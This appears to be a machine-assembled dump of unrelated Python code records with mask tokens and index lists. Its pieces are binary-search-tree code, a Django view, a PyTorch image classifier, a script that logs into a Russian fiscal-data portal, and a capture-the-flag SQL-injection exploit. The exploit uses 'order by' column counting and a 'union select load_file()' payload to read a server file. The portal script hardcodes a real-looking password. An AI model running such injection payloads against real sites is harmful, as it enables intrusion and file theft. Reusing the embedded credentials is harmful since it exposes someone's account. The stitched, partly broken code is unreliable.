def delete(self, root, data, parent):
if root is None:
return root
if root.data < data:
parent = root
root.right = self.delete(root.right, data, parent)
elif root.data > data:
parent = root
root.left = self.delete(root.left, data, parent)
elif root is None or root.data != data:
return False
elif root.left is None and root.right is None:
if data > parent.data:
parent.right = None
root = None
else:
parent.left = None
root = None
elif root.left is None:
if data > parent.data:
parent.right = root.right
root = parent.right
else:
parent.left = root.right
root = parent.left
        elif root.right is None:
            if data > parent.data:
                parent.right = root.left
                root = parent.right
            else:
                parent.left = root.left
                root = parent.left
else:
temp = self.successor(root.right)
root.data = temp.data
root.right = self.delete(root.right, temp.data, parent)
return root
<mask token>
def inorder(self, root):
if root is not None:
self.inorder(root.left)
print(root.data)
self.inorder(root.right)
<mask token>
| <mask token>
class tree(object):
def __init__(self):
self.root = None
def insert(self, root, value):
if self.root == None:
self.root = Node(value)
elif value < root.data:
if root.left is None:
root.left = Node(value)
else:
self.insert(root.left, value)
elif value > root.data:
if root.right is None:
root.right = Node(value)
else:
self.insert(root.right, value)
return root
def delete(self, root, data, parent):
if root is None:
return root
if root.data < data:
parent = root
root.right = self.delete(root.right, data, parent)
elif root.data > data:
parent = root
root.left = self.delete(root.left, data, parent)
elif root is None or root.data != data:
return False
elif root.left is None and root.right is None:
if data > parent.data:
parent.right = None
root = None
else:
parent.left = None
root = None
elif root.left is None:
if data > parent.data:
parent.right = root.right
root = parent.right
else:
parent.left = root.right
root = parent.left
        elif root.right is None:
            if data > parent.data:
                parent.right = root.left
                root = parent.right
            else:
                parent.left = root.left
                root = parent.left
else:
temp = self.successor(root.right)
root.data = temp.data
root.right = self.delete(root.right, temp.data, parent)
return root
    def successor(self, root):
        temp = root
        while temp.left:
            temp = temp.left
        return temp
def inorder(self, root):
if root is not None:
self.inorder(root.left)
print(root.data)
self.inorder(root.right)
<mask token>
| class Node(object):
def __init__(self, data):
self.data = data
self.left = None
self.right = None
self.parent = None
class tree(object):
def __init__(self):
self.root = None
def insert(self, root, value):
if self.root == None:
self.root = Node(value)
elif value < root.data:
if root.left is None:
root.left = Node(value)
else:
self.insert(root.left, value)
elif value > root.data:
if root.right is None:
root.right = Node(value)
else:
self.insert(root.right, value)
return root
def delete(self, root, data, parent):
if root is None:
return root
if root.data < data:
parent = root
root.right = self.delete(root.right, data, parent)
elif root.data > data:
parent = root
root.left = self.delete(root.left, data, parent)
elif root is None or root.data != data:
return False
elif root.left is None and root.right is None:
if data > parent.data:
parent.right = None
root = None
else:
parent.left = None
root = None
elif root.left is None:
if data > parent.data:
parent.right = root.right
root = parent.right
else:
parent.left = root.right
root = parent.left
        elif root.right is None:
            if data > parent.data:
                parent.right = root.left
                root = parent.right
            else:
                parent.left = root.left
                root = parent.left
else:
temp = self.successor(root.right)
root.data = temp.data
root.right = self.delete(root.right, temp.data, parent)
return root
    def successor(self, root):
        temp = root
        while temp.left:
            temp = temp.left
        return temp
def inorder(self, root):
if root is not None:
self.inorder(root.left)
print(root.data)
self.inorder(root.right)
<mask token>
| class Node(object):
def __init__(self, data):
self.data = data
self.left = None
self.right = None
self.parent = None
class tree(object):
def __init__(self):
self.root = None
def insert(self, root, value):
if self.root == None:
self.root = Node(value)
elif value < root.data:
if root.left is None:
root.left = Node(value)
else:
self.insert(root.left, value)
elif value > root.data:
if root.right is None:
root.right = Node(value)
else:
self.insert(root.right, value)
return root
def delete(self, root, data, parent):
if root is None:
return root
if root.data < data:
parent = root
root.right = self.delete(root.right, data, parent)
elif root.data > data:
parent = root
root.left = self.delete(root.left, data, parent)
elif root is None or root.data != data:
return False
elif root.left is None and root.right is None:
if data > parent.data:
parent.right = None
root = None
else:
parent.left = None
root = None
elif root.left is None:
if data > parent.data:
parent.right = root.right
root = parent.right
else:
parent.left = root.right
root = parent.left
        elif root.right is None:
            if data > parent.data:
                parent.right = root.left
                root = parent.right
            else:
                parent.left = root.left
                root = parent.left
else:
temp = self.successor(root.right)
root.data = temp.data
root.right = self.delete(root.right, temp.data, parent)
return root
    def successor(self, root):
        temp = root
        while temp.left:
            temp = temp.left
        return temp
def inorder(self, root):
if root is not None:
self.inorder(root.left)
print(root.data)
self.inorder(root.right)
def main():
Tree = tree()
l = [50, 30, 20, 40, 70, 60, 80]
for item in l:
Tree.insert(Tree.root, item)
print(Tree.delete(Tree.root, 20, None))
print('inorder after deleting 20:')
print(Tree.inorder(Tree.root))
print(Tree.delete(Tree.root, 30, None))
print(Tree.delete(Tree.root, 50, None))
print(Tree.inorder(Tree.root))
<mask token>
| class Node(object):
def __init__(self,data):
self.data = data
self.left = None
self.right = None
self.parent = None
class tree(object):
def __init__(self):
self.root = None
def insert(self,root,value):
if self.root == None:
self.root = Node(value)
else:
if value < root.data:
if root.left is None:
root.left = Node(value)
else:
self.insert(root.left,value)
elif value > root.data:
if root.right is None:
root.right = Node(value)
else:
self.insert(root.right,value)
return root
def delete(self,root,data,parent):
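        # Recursive delete: descend toward `data` while tracking `parent` so
        # the removed node can be spliced out; a node with two children is
        # replaced by its in-order successor (the minimum of its right
        # subtree).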
if root is None:
return root
if root.data < data:
parent = root
root.right = self.delete(root.right,data,parent)
elif root.data > data :
parent = root
root.left = self.delete(root.left,data,parent)
else:
if root is None or root.data != data:
return False
elif root.left is None and root.right is None:
if data > parent.data:
parent.right = None
root = None
else:
parent.left = None
root = None
elif root.left is None:
if data > parent.data:
parent.right = root.right
root = parent.right
else:
parent.left = root.right
root = parent.left
            elif root.right is None:
                if data > parent.data:
                    parent.right = root.left
                    root = parent.right
                else:
                    parent.left = root.left
                    root = parent.left
else:
temp = self.successor(root.right)
root.data = temp.data
root.right = self.delete(root.right,temp.data,parent)
return root
    def successor(self,root):
        temp = root
        while temp.left:
            temp = temp.left
        return temp
def inorder(self,root):
if root is not None:
self.inorder(root.left)
print(root.data)
self.inorder(root.right)
def main():
Tree = tree()
l =[50,30,20,40,70,60,80]
for item in l:
Tree.insert(Tree.root,item)
print(Tree.delete(Tree.root,20,None))
print("inorder after deleting 20:")
print(Tree.inorder(Tree.root))
print(Tree.delete(Tree.root,30,None))
print(Tree.delete(Tree.root,50,None))
print(Tree.inorder(Tree.root))
main()
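# With the list above, the in-order prints after deleting 20, 30 and 50
# should show the remaining keys in sorted order: 40, 60, 70, 80.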
| [
4,
6,
8,
9,
11
] |
82 | 88ec9484e934ce27b13734ca26f79df71b7677e6 | <mask token>
| <mask token>
if len(sys.argv) < 2:
    print('Syntax : python %s <port>' % str(sys.argv[0]))
else:
print('-' * 55)
print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')
print('-' * 55)
r = requests.session()
port = str(sys.argv[1])
url = 'http://docker.hackthebox.eu:'
url = url + port
uri = '/portfolio.php?id=1'
url = url + uri
    print('[*]SQLi Affected URI : %s' % uri)
print('[*]Counting Columns')
for x in range(1, 20):
payload = ' order by %i --+' % x
nurl = url + payload
op = r.get(nurl)
soup = BeautifulSoup(op.text, 'html.parser')
soup = soup.find('p')
soup = str(soup)
size = len(soup.split())
        print('[*]Page size at order by %s : %s' % (x, size))
if size < 36:
col = x - 1
break
print('-' * 55)
    print('[*]Number of Columns : %d' % col)
print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')
print("[*]Trying to read content of '/var/www/html/administrat/panel.php'")
upayload = ' union all select 1'
for x in range(2, col + 1):
x = str(x)
upayload = upayload + ',' + x
<mask token>
    print('[*]Executing : %s' % url)
<mask token>
    if '2' in op:
print('[*]Column 2 is reflected')
print('[*]Injecting payloads in column 2....')
<mask token>
        print('[*]Executing : %s' % url)
<mask token>
print('-' * 55)
        print('[*]Flag : %s' % op)
| <mask token>
if len(sys.argv) < 2:
    print('Syntax : python %s <port>' % str(sys.argv[0]))
else:
print('-' * 55)
print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')
print('-' * 55)
r = requests.session()
port = str(sys.argv[1])
url = 'http://docker.hackthebox.eu:'
url = url + port
uri = '/portfolio.php?id=1'
url = url + uri
    print('[*]SQLi Affected URI : %s' % uri)
print('[*]Counting Columns')
for x in range(1, 20):
payload = ' order by %i --+' % x
nurl = url + payload
op = r.get(nurl)
soup = BeautifulSoup(op.text, 'html.parser')
soup = soup.find('p')
soup = str(soup)
size = len(soup.split())
        print('[*]Page size at order by %s : %s' % (x, size))
if size < 36:
col = x - 1
break
print('-' * 55)
    print('[*]Number of Columns : %d' % col)
print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')
print("[*]Trying to read content of '/var/www/html/administrat/panel.php'")
upayload = ' union all select 1'
for x in range(2, col + 1):
x = str(x)
upayload = upayload + ',' + x
upayload = upayload + ' --+'
url = url + upayload
    print('[*]Executing : %s' % url)
op = r.get(url)
op = str(op.text)
    if '2' in op:
print('[*]Column 2 is reflected')
print('[*]Injecting payloads in column 2....')
upayload = upayload.replace('2',
"load_file('/var/www/html/administrat/panel.php')")
url = 'http://docker.hackthebox.eu:' + port + uri + upayload
        print('[*]Executing : %s' % url)
op = r.get(url)
op = str(op.text)
op = re.search('HTB.*?<', op)
op = str(op.group())
op = op.replace('<', '')
print('-' * 55)
        print('[*]Flag : %s' % op)
| import requests
from bs4 import BeautifulSoup
import sys
import re
if len(sys.argv) < 2:
    print('Syntax : python %s <port>' % str(sys.argv[0]))
else:
print('-' * 55)
print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')
print('-' * 55)
r = requests.session()
port = str(sys.argv[1])
url = 'http://docker.hackthebox.eu:'
url = url + port
uri = '/portfolio.php?id=1'
url = url + uri
    print('[*]SQLi Affected URI : %s' % uri)
print('[*]Counting Columns')
for x in range(1, 20):
payload = ' order by %i --+' % x
nurl = url + payload
op = r.get(nurl)
soup = BeautifulSoup(op.text, 'html.parser')
soup = soup.find('p')
soup = str(soup)
size = len(soup.split())
        print('[*]Page size at order by %s : %s' % (x, size))
if size < 36:
col = x - 1
break
print('-' * 55)
    print('[*]Number of Columns : %d' % col)
print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')
print("[*]Trying to read content of '/var/www/html/administrat/panel.php'")
upayload = ' union all select 1'
for x in range(2, col + 1):
x = str(x)
upayload = upayload + ',' + x
upayload = upayload + ' --+'
url = url + upayload
    print('[*]Executing : %s' % url)
op = r.get(url)
op = str(op.text)
    if '2' in op:
print('[*]Column 2 is reflected')
print('[*]Injecting payloads in column 2....')
upayload = upayload.replace('2',
"load_file('/var/www/html/administrat/panel.php')")
url = 'http://docker.hackthebox.eu:' + port + uri + upayload
        print('[*]Executing : %s' % url)
op = r.get(url)
op = str(op.text)
op = re.search('HTB.*?<', op)
op = str(op.group())
op = op.replace('<', '')
print('-' * 55)
        print('[*]Flag : %s' % op)
| import requests
from bs4 import BeautifulSoup
import sys
import re
if len(sys.argv)<2:
print("Syntax : python %s <port>")%(str(sys.argv[0]))
else:
print('-'*55)
print("HTB WEB-CHALLENGE coded by ZyperX [Freelance]")
print('-'*55)
r=requests.session()
port=str(sys.argv[1])
url="http://docker.hackthebox.eu:"
url=url+port
uri="/portfolio.php?id=1"
url=url+uri
print("[*]SQLi Affected URI : %s")%(uri)
print("[*]Counting Columns")
for x in range(1,20):
payload=(" order by %i --+")%(x)
nurl=url+payload
op=r.get(nurl)
soup=BeautifulSoup(op.text,'html.parser')
soup=soup.find('p')
soup=str(soup)
size=len(soup.split())
print("[*]Page size at order by %s : %s")%(x,size)
if size < 36 :
col= x-1
break
print("-"*55)
print("[*]Number of Columns : %d")%(col)
print("[*]Web App Vulnerable with FILE PRIVILEGE SQLI")
print("[*]Trying to read content of \'/var/www/html/administrat/panel.php\'")
upayload=" union all select 1"
for x in range(2,col+1):
x=str(x)
upayload=upayload+","+x
upayload=upayload+" --+"
url=url+upayload
print("[*]Executing. : %s")%(url)
op=r.get(url)
op=str(op.text)
if op.find("2"):
print("[*]Column 2 is reflected");
print("[*]Injecting payloads in column 2....");
upayload=upayload.replace('2','load_file(\'/var/www/html/administrat/panel.php\')')
url="http://docker.hackthebox.eu:"+port+uri+upayload
print("[*]Excecuting : %s")%(url)
op=r.get(url)
op=str(op.text)
op=re.search("HTB.*?<",op)
op=str(op.group())
op=op.replace('<','')
print("-"*55)
print("[*]Flag : %s")%(op)
| [
0,
1,
2,
3,
4
] |
83 | cd2e03666a890d6e9ea0fcb45fe28510d684916d | <mask token>
def squeezed(client_name):
return client_name.replace('Индивидуальный предприниматель', 'ИП')
def get_kkm_filled_fn(max_fill=80):
LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'
API_URL = 'https://pk.platformaofd.ru/api/monitoring'
session = requests.Session()
print('-= подключение к серверу =-')
session.get(LOGIN_URL)
login_data = {'email': '[email protected]', 'password': 'smart620514',
'username': '[email protected]', 'phone': ''}
print('-= авторизация =-')
session.post(LOGIN_URL, data=login_data)
headers = {'Content-Type': 'application/json;charset=UTF-8'}
payload = (
'{"badgeId":17,"type":"terminal","filterValues":[],"withArchive":0}')
print('-= получение данных с сервера =-')
r = session.post(API_URL, data=payload, headers=headers)
data_from_api = r.json()
all_kkm_list = data_from_api['result']['data']
kkm_quanity = len(all_kkm_list)
print('-= обработка данных =-')
kkm_with_filled_fn = []
for kkm in all_kkm_list:
fn_used = int(kkm['fnSpaceUsed'].strip("'%"))
if fn_used >= max_fill:
kkm_with_filled_fn.append(kkm)
return kkm_with_filled_fn
<mask token>
| <mask token>
def squeezed(client_name):
return client_name.replace('Индивидуальный предприниматель', 'ИП')
def get_kkm_filled_fn(max_fill=80):
LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'
API_URL = 'https://pk.platformaofd.ru/api/monitoring'
session = requests.Session()
print('-= подключение к серверу =-')
session.get(LOGIN_URL)
login_data = {'email': '[email protected]', 'password': 'smart620514',
'username': '[email protected]', 'phone': ''}
print('-= авторизация =-')
session.post(LOGIN_URL, data=login_data)
headers = {'Content-Type': 'application/json;charset=UTF-8'}
payload = (
'{"badgeId":17,"type":"terminal","filterValues":[],"withArchive":0}')
print('-= получение данных с сервера =-')
r = session.post(API_URL, data=payload, headers=headers)
data_from_api = r.json()
all_kkm_list = data_from_api['result']['data']
kkm_quanity = len(all_kkm_list)
print('-= обработка данных =-')
kkm_with_filled_fn = []
for kkm in all_kkm_list:
fn_used = int(kkm['fnSpaceUsed'].strip("'%"))
if fn_used >= max_fill:
kkm_with_filled_fn.append(kkm)
return kkm_with_filled_fn
<mask token>
print(f'ККМ с заполненностью ФН выше {max_fill}%.')
for k in x:
print(
f"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}"
)
| <mask token>
def squeezed(client_name):
return client_name.replace('Индивидуальный предприниматель', 'ИП')
def get_kkm_filled_fn(max_fill=80):
LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'
API_URL = 'https://pk.platformaofd.ru/api/monitoring'
session = requests.Session()
print('-= подключение к серверу =-')
session.get(LOGIN_URL)
login_data = {'email': '[email protected]', 'password': 'smart620514',
'username': '[email protected]', 'phone': ''}
print('-= авторизация =-')
session.post(LOGIN_URL, data=login_data)
headers = {'Content-Type': 'application/json;charset=UTF-8'}
payload = (
'{"badgeId":17,"type":"terminal","filterValues":[],"withArchive":0}')
print('-= получение данных с сервера =-')
r = session.post(API_URL, data=payload, headers=headers)
data_from_api = r.json()
all_kkm_list = data_from_api['result']['data']
kkm_quanity = len(all_kkm_list)
print('-= обработка данных =-')
kkm_with_filled_fn = []
for kkm in all_kkm_list:
fn_used = int(kkm['fnSpaceUsed'].strip("'%"))
if fn_used >= max_fill:
kkm_with_filled_fn.append(kkm)
return kkm_with_filled_fn
max_fill = 80
x = get_kkm_filled_fn(max_fill)
print(f'ККМ с заполненностью ФН выше {max_fill}%.')
for k in x:
print(
f"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}"
)
| import requests
def squeezed(client_name):
return client_name.replace('Индивидуальный предприниматель', 'ИП')
def get_kkm_filled_fn(max_fill=80):
LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'
API_URL = 'https://pk.platformaofd.ru/api/monitoring'
session = requests.Session()
print('-= подключение к серверу =-')
session.get(LOGIN_URL)
login_data = {'email': '[email protected]', 'password': 'smart620514',
'username': '[email protected]', 'phone': ''}
print('-= авторизация =-')
session.post(LOGIN_URL, data=login_data)
headers = {'Content-Type': 'application/json;charset=UTF-8'}
payload = (
'{"badgeId":17,"type":"terminal","filterValues":[],"withArchive":0}')
print('-= получение данных с сервера =-')
r = session.post(API_URL, data=payload, headers=headers)
data_from_api = r.json()
all_kkm_list = data_from_api['result']['data']
kkm_quanity = len(all_kkm_list)
print('-= обработка данных =-')
kkm_with_filled_fn = []
for kkm in all_kkm_list:
fn_used = int(kkm['fnSpaceUsed'].strip("'%"))
if fn_used >= max_fill:
kkm_with_filled_fn.append(kkm)
return kkm_with_filled_fn
max_fill = 80
x = get_kkm_filled_fn(max_fill)
print(f'ККМ с заполненностью ФН выше {max_fill}%.')
for k in x:
print(
f"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}"
)
| import requests
def squeezed (client_name):
return client_name.replace('Индивидуальный предприниматель', 'ИП')
def get_kkm_filled_fn(max_fill=80):
    ## returns the list of cash registers (KKM) whose fiscal drive (FN) is more than max_fill percent full
LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'
API_URL = 'https://pk.platformaofd.ru/api/monitoring'
session = requests.Session()
print('-= подключение к серверу =-')
session.get(LOGIN_URL)
login_data = {
'email': '[email protected]',
'password': 'smart620514',
'username': '[email protected]',
'phone':''}
print('-= авторизация =-')
session.post(LOGIN_URL, data=login_data)
    # request all KKM except archived ones (headers are mandatory!)
headers = {'Content-Type': 'application/json;charset=UTF-8'}
payload = '{"badgeId":17,"type":"terminal","filterValues":[],"withArchive":0}'
print('-= получение данных с сервера =-')
r = session.post (API_URL, data=payload, headers=headers)
data_from_api = r.json()
all_kkm_list = data_from_api['result']['data']
kkm_quanity = len(all_kkm_list)
print('-= обработка данных =-')
kkm_with_filled_fn = []
for kkm in all_kkm_list:
fn_used = int(kkm['fnSpaceUsed'].strip("'%"))
if fn_used >= max_fill:
kkm_with_filled_fn.append(kkm)
return kkm_with_filled_fn
max_fill = 80
x = get_kkm_filled_fn(max_fill)
print(f'Cash registers (KKM) with fiscal storage (FN) filled above {max_fill}%.')
for k in x:
print(f"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}")
| [
2,
3,
4,
5,
6
] |
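The script above posts its JSON body as a hand-built string and never checks the HTTP status. A minimal sketch of the same flow using the json= keyword of requests (which serializes the dict and sets the Content-Type header for us) plus raise_for_status(); the endpoints and payload shape mirror the script, while the credentials here are placeholders:

import requests

LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'
API_URL = 'https://pk.platformaofd.ru/api/monitoring'

def fetch_monitoring(email, password):
    # Placeholder credentials; the login form fields mirror the script above.
    session = requests.Session()
    session.get(LOGIN_URL)  # pick up session cookies before logging in
    session.post(LOGIN_URL, data={'email': email, 'password': password,
                                  'username': email, 'phone': ''})
    payload = {'badgeId': 17, 'type': 'terminal',
               'filterValues': [], 'withArchive': 0}
    r = session.post(API_URL, json=payload, timeout=30)
    r.raise_for_status()  # fail loudly instead of parsing an error page
    return r.json()['result']['data']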
84 | 709f2425bc6e0b0b650fd6c657df6d85cfbd05fe | <mask token>
| <mask token>
def test_petite_vue(request):
return render(request, 'petite_vue_app/test-form.html')
| from django.shortcuts import render
def test_petite_vue(request):
return render(request, 'petite_vue_app/test-form.html')
| from django.shortcuts import render
# Create your views here.
def test_petite_vue(request):
return render(request, 'petite_vue_app/test-form.html')
| null | [
0,
1,
2,
3
] |
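The view above only renders a template, so exercising it needs a URL route. A hypothetical urls.py entry (the path and route name are assumptions, not taken from the project):

# petite_vue_app/urls.py -- hypothetical wiring for the view above
from django.urls import path
from . import views

urlpatterns = [
    path('test-form/', views.test_petite_vue, name='test_petite_vue'),
]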
85 | a4deb67d277538e61c32381da0fe4886016dae33 | <mask token>
class Net(nn.Module):
<mask token>
<mask token>
<mask token>
| <mask token>
for file in glob.glob('*.jpg'):
images.append(file)
<mask token>
for i in range(train_num + test_num):
tags = labels.iloc[i]['tags']
if i < train_num:
train_images.append(imageio.imread(images[i], as_gray=True).flatten())
train_labels.append(int('cloudy' not in tags and 'haze' not in tags))
else:
test_images.append(imageio.imread(images[i], as_gray=True).flatten())
test_labels.append(int('cloudy' not in tags and 'haze' not in tags))
class Net(nn.Module):
def __init__(self, input_size, hidden_size, num_classes):
super(Net, self).__init__()
self.h1 = nn.Linear(input_size, hidden_size)
self.h2 = nn.Linear(hidden_size, hidden_size_1)
self.h3 = nn.Linear(hidden_size_1, hidden_size_2)
self.h4 = nn.Linear(hidden_size_2, hidden_size_3)
self.o = nn.Linear(hidden_size_3, num_classes)
def forward(self, x):
x = torch.sigmoid(self.h1(x))
x = torch.sigmoid(self.h2(x))
x = torch.sigmoid(self.h3(x))
x = torch.sigmoid(self.h4(x))
x = torch.sigmoid(self.o(x))
return x
<mask token>
for epoch in range(num_epochs):
for i, image in enumerate(train_images):
image = torch.Tensor(train_images[i]).reshape(1, 65536)
label = torch.Tensor([int(train_labels[i])])
outputs = model(image)
outputs = outputs.squeeze(0)
loss = criterion(outputs, label)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (i + 1) % 100 == 0:
print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +
1, num_epochs, i + 1, total_step, loss.item()))
with torch.no_grad():
correct = 0
total = 0
for i, image in enumerate(test_images):
image = torch.Tensor(test_images[i]).reshape(1, 65536)
label = torch.Tensor([int(test_labels[i])])
outputs = model(image)
outputs = outputs.squeeze(0)
outputs = 1 if torch.sum(outputs) >= 0.5 else 0
if outputs == torch.sum(label):
correct += 1
elif outputs == 0:
print('#############')
print(i, outputs, torch.sum(label))
print('Accuracy of the network on the {} test images: {} %'.format(len(
test_images), 100 * correct / len(test_images)))
torch.save(model.state_dict(), 'model.ckpt')
| <mask token>
fileDir = os.getcwd()
input_size = 65536
hidden_size = 20
hidden_size_1 = 15
hidden_size_2 = 10
hidden_size_3 = 5
num_classes = 1
learning_rate = 0.001
num_epochs = 5
train_num = 1000
test_num = 148
images = []
for file in glob.glob('*.jpg'):
images.append(file)
images = sorted(images, key=lambda filename: int(filename[6:-4]))
train_images = []
test_images = []
train_labels = []
test_labels = []
labels = pd.read_csv('./train_v2.csv')
for i in range(train_num + test_num):
tags = labels.iloc[i]['tags']
if i < train_num:
train_images.append(imageio.imread(images[i], as_gray=True).flatten())
train_labels.append(int('cloudy' not in tags and 'haze' not in tags))
else:
test_images.append(imageio.imread(images[i], as_gray=True).flatten())
test_labels.append(int('cloudy' not in tags and 'haze' not in tags))
class Net(nn.Module):
def __init__(self, input_size, hidden_size, num_classes):
super(Net, self).__init__()
self.h1 = nn.Linear(input_size, hidden_size)
self.h2 = nn.Linear(hidden_size, hidden_size_1)
self.h3 = nn.Linear(hidden_size_1, hidden_size_2)
self.h4 = nn.Linear(hidden_size_2, hidden_size_3)
self.o = nn.Linear(hidden_size_3, num_classes)
def forward(self, x):
x = torch.sigmoid(self.h1(x))
x = torch.sigmoid(self.h2(x))
x = torch.sigmoid(self.h3(x))
x = torch.sigmoid(self.h4(x))
x = torch.sigmoid(self.o(x))
return x
model = Net(input_size, hidden_size, num_classes)
criterion = nn.SoftMarginLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
total_step = len(train_images)
for epoch in range(num_epochs):
for i, image in enumerate(train_images):
image = torch.Tensor(train_images[i]).reshape(1, 65536)
label = torch.Tensor([int(train_labels[i])])
outputs = model(image)
outputs = outputs.squeeze(0)
loss = criterion(outputs, label)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (i + 1) % 100 == 0:
print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +
1, num_epochs, i + 1, total_step, loss.item()))
with torch.no_grad():
correct = 0
total = 0
for i, image in enumerate(test_images):
image = torch.Tensor(test_images[i]).reshape(1, 65536)
label = torch.Tensor([int(test_labels[i])])
outputs = model(image)
outputs = outputs.squeeze(0)
outputs = 1 if torch.sum(outputs) >= 0.5 else 0
if outputs == torch.sum(label):
correct += 1
elif outputs == 0:
print('#############')
print(i, outputs, torch.sum(label))
print('Accuracy of the network on the {} test images: {} %'.format(len(
test_images), 100 * correct / len(test_images)))
torch.save(model.state_dict(), 'model.ckpt')
| import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import cv2
import imageio
import pandas as pd
import glob, os
import numpy as np
fileDir = os.getcwd()
input_size = 65536
hidden_size = 20
hidden_size_1 = 15
hidden_size_2 = 10
hidden_size_3 = 5
num_classes = 1
learning_rate = 0.001
num_epochs = 5
train_num = 1000
test_num = 148
images = []
for file in glob.glob('*.jpg'):
images.append(file)
images = sorted(images, key=lambda filename: int(filename[6:-4]))
train_images = []
test_images = []
train_labels = []
test_labels = []
labels = pd.read_csv('./train_v2.csv')
for i in range(train_num + test_num):
tags = labels.iloc[i]['tags']
if i < train_num:
train_images.append(imageio.imread(images[i], as_gray=True).flatten())
train_labels.append(int('cloudy' not in tags and 'haze' not in tags))
else:
test_images.append(imageio.imread(images[i], as_gray=True).flatten())
test_labels.append(int('cloudy' not in tags and 'haze' not in tags))
class Net(nn.Module):
def __init__(self, input_size, hidden_size, num_classes):
super(Net, self).__init__()
self.h1 = nn.Linear(input_size, hidden_size)
self.h2 = nn.Linear(hidden_size, hidden_size_1)
self.h3 = nn.Linear(hidden_size_1, hidden_size_2)
self.h4 = nn.Linear(hidden_size_2, hidden_size_3)
self.o = nn.Linear(hidden_size_3, num_classes)
def forward(self, x):
x = torch.sigmoid(self.h1(x))
x = torch.sigmoid(self.h2(x))
x = torch.sigmoid(self.h3(x))
x = torch.sigmoid(self.h4(x))
x = torch.sigmoid(self.o(x))
return x
model = Net(input_size, hidden_size, num_classes)
criterion = nn.SoftMarginLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
total_step = len(train_images)
for epoch in range(num_epochs):
for i, image in enumerate(train_images):
image = torch.Tensor(train_images[i]).reshape(1, 65536)
label = torch.Tensor([int(train_labels[i])])
outputs = model(image)
outputs = outputs.squeeze(0)
loss = criterion(outputs, label)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (i + 1) % 100 == 0:
print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +
1, num_epochs, i + 1, total_step, loss.item()))
with torch.no_grad():
correct = 0
total = 0
for i, image in enumerate(test_images):
image = torch.Tensor(test_images[i]).reshape(1, 65536)
label = torch.Tensor([int(test_labels[i])])
outputs = model(image)
outputs = outputs.squeeze(0)
outputs = 1 if torch.sum(outputs) >= 0.5 else 0
if outputs == torch.sum(label):
correct += 1
elif outputs == 0:
print('#############')
print(i, outputs, torch.sum(label))
print('Accuracy of the network on the {} test images: {} %'.format(len(
test_images), 100 * correct / len(test_images)))
torch.save(model.state_dict(), 'model.ckpt')
| import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import cv2
import imageio
import pandas as pd
import glob, os
import numpy as np
fileDir = os.getcwd()
# os.chdir("./train-jpg")
# there are 40480 training examples
# we will allocate 39000 for training
# and the remaining 1480 will be for validation
input_size = 65536 # 256^2
hidden_size = 20
hidden_size_1 = 15
hidden_size_2 = 10
hidden_size_3 = 5
num_classes = 1
learning_rate = 0.001
num_epochs = 5
train_num = 1000
test_num = 148
# train_num = 39000
# test_num = 1480
# %% Load data--for clouds and non-clouds
images = []
for file in glob.glob("*.jpg"):
images.append(file)
images = sorted(images, key=lambda filename: int(filename[6: -4])) # string slicing so that the images sort in numeric order
train_images = []
test_images = []
train_labels = []
test_labels = []
labels = pd.read_csv("./train_v2.csv") # label is 1 when the image has no cloudy/haze tags, 0 otherwise
for i in range(train_num + test_num):
tags = labels.iloc[i]["tags"]
if i < train_num:
train_images.append(imageio.imread(images[i], as_gray=True).flatten())
train_labels.append(int("cloudy" not in tags and "haze" not in tags))
# train_labels.append(int("water" not in tags))
else:
test_images.append(imageio.imread(images[i], as_gray=True).flatten())
test_labels.append(int("cloudy" not in tags and "haze" not in tags))
# test_labels.append(int("water" not in tags))
class Net(nn.Module):
def __init__(self, input_size, hidden_size, num_classes):
super(Net, self).__init__()
# parameters
# weights
# self.h1 = nn.Sigmoid() # input_size, hidden_size
# self.o = nn.Sigmoid() # hidden_size, num_classes
self.h1 = nn.Linear(input_size, hidden_size)
self.h2 = nn.Linear(hidden_size, hidden_size_1)
self.h3 = nn.Linear(hidden_size_1, hidden_size_2)
self.h4 = nn.Linear(hidden_size_2, hidden_size_3)
self.o = nn.Linear(hidden_size_3, num_classes)
def forward(self, x):
x = torch.sigmoid(self.h1(x))
# print("doing x: {}".format(x.shape))
x = torch.sigmoid(self.h2(x))
x = torch.sigmoid(self.h3(x))
x = torch.sigmoid(self.h4(x))
x = torch.sigmoid(self.o(x))
return x
# %%
model = Net(input_size, hidden_size, num_classes) # no device configuration here
criterion = nn.SoftMarginLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
# model = TheModelClass(*args, **kwargs)
# model.load_state_dict(torch.load("model.ckpt"))
# model.eval()
# optimizer = TheOptimizerClass(*args, **kwargs)
# checkpoint = torch.load('./model.ckpt')
# model.load_state_dict(checkpoint['model_state_dict'])
# optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
# epoch = checkpoint['epoch']
# loss = checkpoint['loss']
total_step = len(train_images)
for epoch in range(num_epochs):
for i, image in enumerate(train_images):
image = torch.Tensor(train_images[i]).reshape(1, 65536)
label = torch.Tensor([int(train_labels[i])])
# label = label.long()
# label = label.reshape(1,1)
# label = label.squeeze()
